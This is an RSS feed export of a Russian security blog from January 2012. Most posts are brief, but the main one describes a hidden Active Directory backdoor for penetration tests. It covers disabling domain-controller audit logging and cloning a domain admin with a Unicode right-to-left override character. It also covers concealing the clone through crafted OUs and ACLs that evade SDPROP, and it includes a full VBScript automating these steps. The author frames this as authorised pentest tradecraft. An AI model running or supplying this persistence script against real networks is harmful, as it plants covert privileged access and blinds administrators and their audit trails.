<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>В тему ИБ</title><link>http://devteev.blogspot.com/</link><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/devteev" /><description></description><language>en</language><managingEditor>noreply@blogger.com (Dmitry Evteev)</managingEditor><lastBuildDate>Fri, 27 Jan 2012 02:34:29 PST</lastBuildDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">264</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">25</openSearch:itemsPerPage><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="devteev" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><media:category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Technology</media:category><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><itunes:explicit>no</itunes:explicit><itunes:subtitle></itunes:subtitle><itunes:category text="Technology" /><item><title>Доигрался или звезда в шоке)</title><link>http://devteev.blogspot.com/2012/01/blog-post_27.html</link><category>юмор</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Fri, 27 Jan 2012 01:11:19 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-2664344707078744066</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;NO COMMENTS ^_^&lt;/b&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-9Qt_JeeCT9Y/TyJqDwNYaaI/AAAAAAAABY0/Zun5uxZVVR0/s1600/read-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="218" src="http://4.bp.blogspot.com/-9Qt_JeeCT9Y/TyJqDwNYaaI/AAAAAAAABY0/Zun5uxZVVR0/s640/read-only.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-2664344707078744066?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-27T13:11:19.074+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-9Qt_JeeCT9Y/TyJqDwNYaaI/AAAAAAAABY0/Zun5uxZVVR0/s72-c/read-only.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total></item><item><title>Вебинары Positive Technologies</title><link>http://devteev.blogspot.com/2012/01/positive-technologies.html</link><category>вебинары</category><category>positive technologies</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 26 Jan 2012 15:33:26 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-76874915018266628</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div&gt;&lt;a href="http://4.bp.blogspot.com/-8snQUhmqg5E/TyHdzM8jr6I/AAAAAAAABYs/QiPgFB8ldsU/s1600/logo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-8snQUhmqg5E/TyHdzM8jr6I/AAAAAAAABYs/QiPgFB8ldsU/s1600/logo.png" /&gt;&lt;/a&gt;Опубликовано расписание образовательной программы "&lt;a href="http://www.ptsecurity.ru/webinars.asp"&gt;Практическая безопасность&lt;/a&gt;"&amp;nbsp;на первое полугодие 2012 года. Стоит отметить, что запланированный список тем не является окончательным и со временем будет пополняться. Разумеется, все самые "вкусные" темы припасены на международный форум &lt;a href="http://phdays.ru/"&gt;Positive Hack Days&lt;/a&gt; :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;А пока счет 7/4 и&amp;nbsp;&lt;a href="http://www.ptsecurity.ru/maxpatrol.asp"&gt;MaxPatrol&lt;/a&gt;&amp;nbsp;заметно&amp;nbsp;лидирует))&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-76874915018266628?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-27T03:33:26.438+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-8snQUhmqg5E/TyHdzM8jr6I/AAAAAAAABYs/QiPgFB8ldsU/s72-c/logo.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Как MaxPatrol ищет 0day?</title><link>http://devteev.blogspot.com/2012/01/maxpatrol-0day_25.html</link><category>positive technologies</category><category>maxpatrol</category><category>0day</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Wed, 25 Jan 2012 07:47:09 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4836334327006005450</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Легко! :)&amp;nbsp;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-12-015/"&gt;http://www.zerodayinitiative.com/advisories/ZDI-12-015/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-sK8eoaFnCUA/TyAj1YJtbXI/AAAAAAAABYk/AVZFhV4RgxY/s1600/zdi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="408" src="http://2.bp.blogspot.com/-sK8eoaFnCUA/TyAj1YJtbXI/AAAAAAAABYk/AVZFhV4RgxY/s640/zdi.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-4836334327006005450?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-25T19:47:09.562+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-sK8eoaFnCUA/TyAj1YJtbXI/AAAAAAAABYk/AVZFhV4RgxY/s72-c/zdi.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total></item><item><title>Backdoor в Active Directory следующего поколения</title><link>http://devteev.blogspot.com/2012/01/backdoor-active-directory.html</link><category>pentest</category><category>тест на проникновение</category><category>security</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 10 Jan 2012 00:33:33 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6374246124939846207</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;В начале прошлого года мною уже &lt;a href="http://devteev.blogspot.com/2011/02/backdoor-active-directory.html"&gt;поднималась&lt;/a&gt; тема пост-эксплуатации в домене Microsoft Active Directory. В предложенном &lt;a href="http://devteev.blogspot.com/2011/02/backdoor-active-directory.html"&gt;ранее подходе&lt;/a&gt; рассматривался вариант ориентированный больше на случай утери административных привилегий, нежели их непосредственное использование. При этом само действо по возврату этих привилегий подразумевало "шумные" события и визуально палевные манипуляции в каталоге. Другими словами, для того, чтобы вернуть себе административные привилегии в домене, требовалось стать участником соответствующей группы безопасности, например, группы "Domain Admins".&lt;br /&gt;
&lt;br /&gt;
Надо сказать, что администраторы очень волнуются, когда неожиданно осознают присутствие в своей системе кого-то еще. Некоторые из них бросаются всеми силами обрабатывать инцидент безопасности. Порой, самыми непредсказуемыми действиями ;))&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-4LyGFN-AeIA/TwsZv1PCt1I/AAAAAAAABXs/KOMhfG3zgBQ/s1600/m1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="444" src="http://2.bp.blogspot.com/-4LyGFN-AeIA/TwsZv1PCt1I/AAAAAAAABXs/KOMhfG3zgBQ/s640/m1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Теперь представьте, как себя может повести администратор Active Directory в крупной компании, при виде незнакомого идентификатора в группе безопасности "Enterprise Admins"? В случае если кто-то залился не понарошку, тогда озабоченность администратора полностью оправдана. Но в случае недостаточного противодействия при проведении пентеста, шибко волноваться явно не стоит (ровно, как лишать парней точек входа и добытых потом и кровью привилегий).&lt;br /&gt;
&lt;br /&gt;
Я долго размышлял над тем, как, не пугая администраторов, свободно пользоваться достигнутыми привилегиями в ходе проведения тестирования на проникновение (особенно на фоне агрессивного противодействия со стороны администраторов на последних работах). С одной стороны, при проведении пентеста мы сильно ограничены в возможностях. Например, правило по минимизации воздействия на объект исследования – это как само собой разумеющееся. Поэтому наплодить и раскидать бэкдоров по захваченной сети мы попросту не можем. С другой стороны, есть совершенно понятные цели, к которым требуется прийти до того момента, как радостный администратор заметит несанкционированную активность и выдернет шнур из розетки.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Так как же можно оставаться незамеченным в сетях Microsoft?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Первое, что приходит в голову - использовать учетную запись администратора. Доступ легитимный, поэтому он не должен привлекать к себе особое внимание. Но, как показывает практика, не всегда удается получить пароль администратора в открытом виде. В этих случаях на помощь спешит атака, известная под названием &lt;a href="http://oss.coresecurity.com/pshtoolkit/doc/index.html"&gt;Pass-the-Hash&lt;/a&gt;. Было бы почти все замечательно (почти, потому как Pass-the-Hash сужает возможности по развитию атаки, например, нельзя воспользоваться протоколом удаленного управления RDP), но в серьезных компаниях администраторы потихоньку переходят на смарт-карты, что не позволяет использовать атаки, основанные на недостатках протокола NTLM. Хорошо, но есть же еще возможность использования токена авторизованного пользователя (eq &lt;a href="http://www.offensive-security.com/metasploit-unleashed/Fun_With_Incognito"&gt;incognito&lt;/a&gt;) и/или билета Kerberos (eq &lt;a href="http://www.ampliasecurity.com/research/wcefaq.html"&gt;WCE&lt;/a&gt;). Так-то оно конечно так, но на практике Kerberos не керберос и токен не токен:( Доступный инструментарий по проведению данных видов атак, к сожалению, откровенно лажает. Кроме того, в обоих случаях, ровно как с атакой Pass-the-Hash, действия атакующего весьма ограничены используемыми протоколами, поддерживающими SSO в домене.&lt;br /&gt;
&lt;br /&gt;
Таким образом, самый привлекательный путь - это использование привилегий, если уж не существующего, так созданного идентификатора администратора домена с известным паролем...&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Как при этом не нарваться на бдительный глаз администратора домена?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Во-первых, внесение изменений в каталог Active Directory порождает соответствующие события, о которых администратору лучше не знать. Поэтому перед заливкой в домен (разумеется, только при проведении тестирования на проникновение и после согласования сего действа с ответственным лицом на стороне заказчика) рекомендуется отключить ведение событий безопасности на контролерах домена посредством соответствующего GPO. Напомню, что по умолчанию время фонового обновления групповых политик для контроллеров домена составляет 15 минут.&lt;br /&gt;
&lt;br /&gt;
Во-вторых, никто не мешает создать визуально идентичную учетную запись, аналогичную существующему администратору домена. Для этого, например, могут использоваться символы юникода (!). Далее, созданному пользователю выставляется атрибут "showInAdvancedViewOnly" в значение "TRUE", что позволит скрыть объект в стандартном режиме просмотра оснастки "Управления пользователями и компьютерами" (dsa.msc). После чего, осталось поместить этого пользователя в одну из административных групп, свободную от реального администратора домена (прим., как правило, администраторы любят воткнуть свою учетную запись во все мыслимые и не мыслимые административные группы; например, оставим администратора в группе "Enterprise Admins", а клона поместим в группу "Domain Admins").&lt;br /&gt;
&lt;br /&gt;
Но я думаю, что многие из читателей уже засомневалась в успехе компании. И они правы! Этот способ никуда не годится, т.к. в нем присутствуют два существенных недостатка:&lt;br /&gt;
1. Созданный идентификатор пользователя виден в каталоге "вооруженным глазом".&lt;br /&gt;
2. При поиске пользователей в домене, учетная запись администратора начинает двоиться.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Как можно решить эти проблемы?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Казалось бы, самое простое решение на поверхности – правильно настроить права доступа к создаваемому объекту (нашему пользователю). Для этого достаточно группе "Everyone" запретить читать публичную информацию у объекта. И в организационной единице, рядом с реальным администратором Active Directory повиснет "нечто", что как минимум перестанет светиться при поиске пользователей в домене. Однако сказка продлится не более, чем 60 минут:( Дело в том, что по умолчанию каждые 60 минут на контроллере домена, выполняющего роль эмулятора PDC, запускается процесс "SDPROP", который восстанавливает права доступа у ряда объектов Active Directory (в том числе, у всех членов групп администраторов) в соответствии с установленными правами доступа на объект "AdminSDHolder" (&lt;a href="http://technet.microsoft.com/en-us/query/ee361593"&gt;http://technet.microsoft.com/en-us/query/ee361593&lt;/a&gt;).&lt;br /&gt;
&lt;br /&gt;
К сожалению, отключить указанный механизм безопасности штатными возможностями невозможно. Хак с правами доступа на объект может привести к проблемам с репликацией (а тут уже попахивает какой-то диверсией; при пентесте низя). Перезапись прав доступа на "AdminSDHolder" затронет множество объектов, включая идентификаторы всех администраторов домена. Таким образом, одним из возможных полезных решений, может быть регулярный запуск сценария, который будет исправлять погрешности процесса "SDPROP", но есть и более перспективная альтернатива.&lt;br /&gt;
&lt;br /&gt;
Процесс "SDPROP" восстанавливает права доступа (ACE) только на конкретные привилегированные объекты, при этом права доступа для организационных единиц, в которых содержатся подобные объекты, остаются неизменными. Этим-то как раз и можно воспользоваться! Нам ведь никто не мешает, используя символы юникода, создать аналогичную последовательность организационных единиц, аналогично той последовательности, в которой содержится клонируемый идентификатор. При этом, "правильные" права доступа на вышестоящий контейнер позволят его визуально скрыть от посторонних глаз (разумеется в пределах разумного).&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Zpd-XokjjuM/TwsZ7_GBlKI/AAAAAAAABX0/kvHLO6JzcAs/s1600/m2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="372" src="http://2.bp.blogspot.com/-Zpd-XokjjuM/TwsZ7_GBlKI/AAAAAAAABX0/kvHLO6JzcAs/s640/m2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-ezlQ9LalAF8/TwsZ_-LviII/AAAAAAAABX8/4m62h8j9aGc/s1600/m3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="366" src="http://3.bp.blogspot.com/-ezlQ9LalAF8/TwsZ_-LviII/AAAAAAAABX8/4m62h8j9aGc/s640/m3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Смысл подобного подхода заключается в том, что у администратора Active Directory не должны появиться нездоровые подозрения на тему того, что доверенная ему система была скомпрометирована. Он по-прежнему остается действующим администратором, разве что членом одной из привилегированных групп является визуально идентичная учетная запись...&lt;br /&gt;
&lt;br /&gt;
И последнее. Для того чтобы созданный клон не дублировался в поиске по каталогу можно воспользоваться, например, символом "&lt;a href="http://www.fileformat.info/info/unicode/char/202e/index.htm"&gt;202E&lt;/a&gt;" (респект &lt;a href="https://twitter.com/#!/arbitrarycode"&gt;Александру Зайцеву&lt;/a&gt; за напоминалку). Указанный символ переворачивает строку, расположенную за ним. Таким образом, если мы, к примеру, создаем клон для идентификатора "dmitry.ivanov", создаваемый идентификатор будет иметь вид "202E"+"vonavi.yrtimd". Возможно, такой подход не так удобен для прохождения аутентификации, но от попадания в поиск по каталогу спасает.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-XhcLFt90iGk/TwsaE7ZCMJI/AAAAAAAABYE/GWNN3ESzMS8/s1600/m4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="324" src="http://2.bp.blogspot.com/-XhcLFt90iGk/TwsaE7ZCMJI/AAAAAAAABYE/GWNN3ESzMS8/s640/m4.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
С точки зрения журналов безопасности, рассматриваемый подход также позволяет оставаться незамеченным до определенного момента.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Lec6xfCsIAw/TwsaKMK-onI/AAAAAAAABYM/Sgvfm5aapaE/s1600/m5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="386" src="http://2.bp.blogspot.com/-Lec6xfCsIAw/TwsaKMK-onI/AAAAAAAABYM/Sgvfm5aapaE/s640/m5.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Ниже представлен сценарий, который автоматизирует все выше сказанное. Настраиваемые параметры:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;strAdminsamAccountName&lt;/b&gt; – идентификатор, который требуется с клонировать&lt;br /&gt;
&lt;b&gt;strAdminsGroup&lt;/b&gt; – привилегированная группа, в которую следует поместить клона&lt;br /&gt;
&lt;b&gt;strPassNewUser&lt;/b&gt; – задаваемый пароль новому пользователю&lt;br /&gt;
&lt;br /&gt;
&lt;textarea class="xml" name="code" rows="50"&gt;&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; strAdminsamAccountName = "dmitry.ivanov"&amp;lt;br /&amp;gt; strAdminsGroup = "Domain Admins"&amp;lt;br /&amp;gt; strPassNewUser = "P@ssw0rd"&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; ' - - -&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; Dim arrContainer(), i&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; Set objRootDSE = GetObject("LDAP://RootDSE")&amp;lt;br /&amp;gt; strDomain = objRootDSE.Get("DefaultNamingContext")&amp;lt;br /&amp;gt; Set objDomain = GetObject("LDAP://" &amp;amp; strDomain)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; strAdminsamAccountNameDN = SearchDN("' WHERE objectCategory='user' AND samAccountName = '" &amp;amp; strAdminsamAccountName &amp;amp; "'")&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; If Not IsNull(strAdminsamAccountNameDN) Then&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objAdmin = GetObject("LDAP://" &amp;amp; strAdminsamAccountNameDN)&amp;lt;br /&amp;gt;  Set objOU = GetObject(objAdmin.parent)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  i=0&amp;lt;br /&amp;gt;  Call EnumOUs(objOU)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  For j = i-1 To 0 Step -1&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;   if strContainer="" Then&amp;lt;br /&amp;gt;    strContainer = "OU=" &amp;amp; arrContainer(j) &amp;amp; strContainer&amp;lt;br /&amp;gt;    primaryContainer = strContainer&amp;lt;br /&amp;gt;   Else&amp;lt;br /&amp;gt;    strContainer = "OU=" &amp;amp; arrContainer(j) &amp;amp; "," &amp;amp; strContainer&amp;lt;br /&amp;gt;   End if&amp;lt;br /&amp;gt;   Set objOUcreate = objDomain.Create("organizationalUnit", strContainer)&amp;lt;br /&amp;gt;   objOUcreate.SetInfo&amp;lt;br /&amp;gt;  Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objContainer = GetObject("LDAP://" &amp;amp; strContainer &amp;amp; "," &amp;amp; strDomain)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objUserCreate = objContainer.Create("User", "cn=" &amp;amp; ChrW(8238) &amp;amp; StrReverse(objAdmin.displayName))&amp;lt;br /&amp;gt;  objUserCreate.Put "sAMAccountName", ChrW(8238) &amp;amp; StrReverse(strAdminsamAccountName)&amp;lt;br /&amp;gt;  objUserCreate.SetInfo&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objUserCreate.SetPassword strPassNewUser&amp;lt;br /&amp;gt;  objUserCreate.Put "userAccountControl", 66048&amp;lt;br /&amp;gt;  objUserCreate.Put "givenName", ChrW(8238) &amp;amp; StrReverse(objAdmin.givenName)&amp;lt;br /&amp;gt;  objUserCreate.Put "sn", ChrW(8238) &amp;amp; StrReverse(objAdmin.sn)&amp;lt;br /&amp;gt;  objUserCreate.Put "initials", ChrW(8238) &amp;amp; StrReverse(objAdmin.initials)&amp;lt;br /&amp;gt;  objUserCreate.SetInfo&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objUserCreate.Put "showInAdvancedViewOnly", "TRUE"&amp;lt;br /&amp;gt;  objUserCreate.SetInfo&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  NewUserDN = "cn=" &amp;amp; ChrW(8238) &amp;amp; StrReverse(objAdmin.displayName) &amp;amp; "," &amp;amp; objContainer.distinguishedName&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  strAdminsGroupDN = SearchDN("' WHERE objectCategory='group' AND samAccountName = '" &amp;amp; strAdminsGroup &amp;amp; "'")&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  If Not IsNull(strAdminsGroupDN) Then&amp;lt;br /&amp;gt;   Set objGroup = GetObject("LDAP://" &amp;amp; strAdminsGroupDN)&amp;lt;br /&amp;gt;   objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN)&amp;lt;br /&amp;gt;   objGroup.SetInfo&amp;lt;br /&amp;gt;   objGroup.PutEx 3, "member", Array(NewUserDN)&amp;lt;br /&amp;gt;   objGroup.SetInfo&amp;lt;br /&amp;gt;  End If&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  OUAddAce(primaryContainer &amp;amp; "," &amp;amp; strDomain)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; End If&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; Function SearchDN(str)&amp;lt;br /&amp;gt;  Set objConnection = CreateObject("ADODB.Connection")&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objConnection.Provider = "ADsDSOObject"&amp;lt;br /&amp;gt;  objConnection.Open "Active Directory Provider"&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objCommand = CreateObject("ADODB.Command")&amp;lt;br /&amp;gt;  Set objCommand.ActiveConnection = objConnection&amp;lt;br /&amp;gt;  objCommand.Properties("Searchscope") = 2&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objCommand.CommandText = "SELECT distinguishedName FROM 'LDAP://" &amp;amp; strDomain &amp;amp; str&amp;lt;br /&amp;gt;  Set objRecordSet = objCommand.Execute&amp;lt;br /&amp;gt;  If Not objRecordSet.EOF Then&amp;lt;br /&amp;gt;   SearchDN = objRecordSet.Fields("distinguishedName").Value&amp;lt;br /&amp;gt;  End if&amp;lt;br /&amp;gt; End Function&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; Sub EnumOUs(objChild)&amp;lt;br /&amp;gt;  Dim objParent&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objParent = GetObject(objChild.Parent)&amp;lt;br /&amp;gt;  If (objParent.Class = "organizationalUnit") Then&amp;lt;br /&amp;gt;   ReDim Preserve arrContainer(i + 1)&amp;lt;br /&amp;gt;   arrContainer(i) = objChild.ou&amp;lt;br /&amp;gt;   i=i+1&amp;lt;br /&amp;gt;   Call EnumOUs(objParent)&amp;lt;br /&amp;gt;  Else&amp;lt;br /&amp;gt;   ReDim Preserve arrContainer(i + 1)&amp;lt;br /&amp;gt;   arrContainer(i) = objChild.ou &amp;amp; ChrW(128)&amp;lt;br /&amp;gt;   i=i+1&amp;lt;br /&amp;gt;  End If&amp;lt;br /&amp;gt; End Sub&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; Function OUAddAce(OU)&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Dim objSdUtil, objSD, objDACL, objAce&amp;lt;br /&amp;gt;  Set objOU = GetObject ("LDAP://" &amp;amp; OU) &amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  Set objSdUtil = GetObject(objOU.ADsPath)&amp;lt;br /&amp;gt;  Set objSD = objSdUtil.Get("ntSecurityDescriptor")&amp;lt;br /&amp;gt;  Set objDACL = objSD.DiscretionaryACL&amp;lt;br /&amp;gt;  Set objAce = CreateObject("AccessControlEntry")&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objAce.Trustee = "Everyone"&amp;lt;br /&amp;gt;  objAce.AceFlags = 2&amp;lt;br /&amp;gt;  objAce.AceType = 6&amp;lt;br /&amp;gt;  objAce.AccessMask = 16&amp;lt;br /&amp;gt;  objAce.Flags = 1&amp;lt;br /&amp;gt;  objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}"&amp;lt;br /&amp;gt;  objDacl.AddAce objAce&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objSD.DiscretionaryAcl = objDacl&amp;lt;br /&amp;gt;  objSDUtil.Put "ntSecurityDescriptor", Array(objSD)&amp;lt;br /&amp;gt;  objSDUtil.SetInfo&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor")&amp;lt;br /&amp;gt;  intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control&amp;lt;br /&amp;gt;  intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &amp;amp;H1000&amp;lt;br /&amp;gt;  objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl&amp;lt;br /&amp;gt;  objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor&amp;lt;br /&amp;gt;  objOU.SetInfo&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; End Function&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; &lt;/textarea&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-6374246124939846207?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-10T12:33:33.403+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-4LyGFN-AeIA/TwsZv1PCt1I/AAAAAAAABXs/KOMhfG3zgBQ/s72-c/m1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total></item><item><title>С новым годом!!!</title><link>http://devteev.blogspot.com/2012/01/blog-post.html</link><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 03 Jan 2012 03:30:52 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-2432163363029580288</guid><description>Поздравляю всех с уже наступившим Новым годом 2012! Желаю творческих успехов, удачи в этом году и, разумеется, больше позитива!!! :)&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe width="560" height="315" src="http://www.youtube.com/embed/phVdWG5nPI4" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-2432163363029580288?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-03T15:30:52.653+04:00</app:edited><media:thumbnail url="http://img.youtube.com/vi/phVdWG5nPI4/default.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Подведение итогов PHDays CTF AfterParty 2011</title><link>http://devteev.blogspot.com/2011/12/phdays-ctf-afterparty-2011.html</link><category>CTF</category><category>HackQuest</category><category>phdays</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 27 Dec 2011 09:42:08 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-7234282828438677928</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;a href="http://3.bp.blogspot.com/-gXak63jeiR0/TvoC-Ew32RI/AAAAAAAABXk/aMZozcmVmn0/s1600/PHD+CTF+AfterParty+2011+kyprizel.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 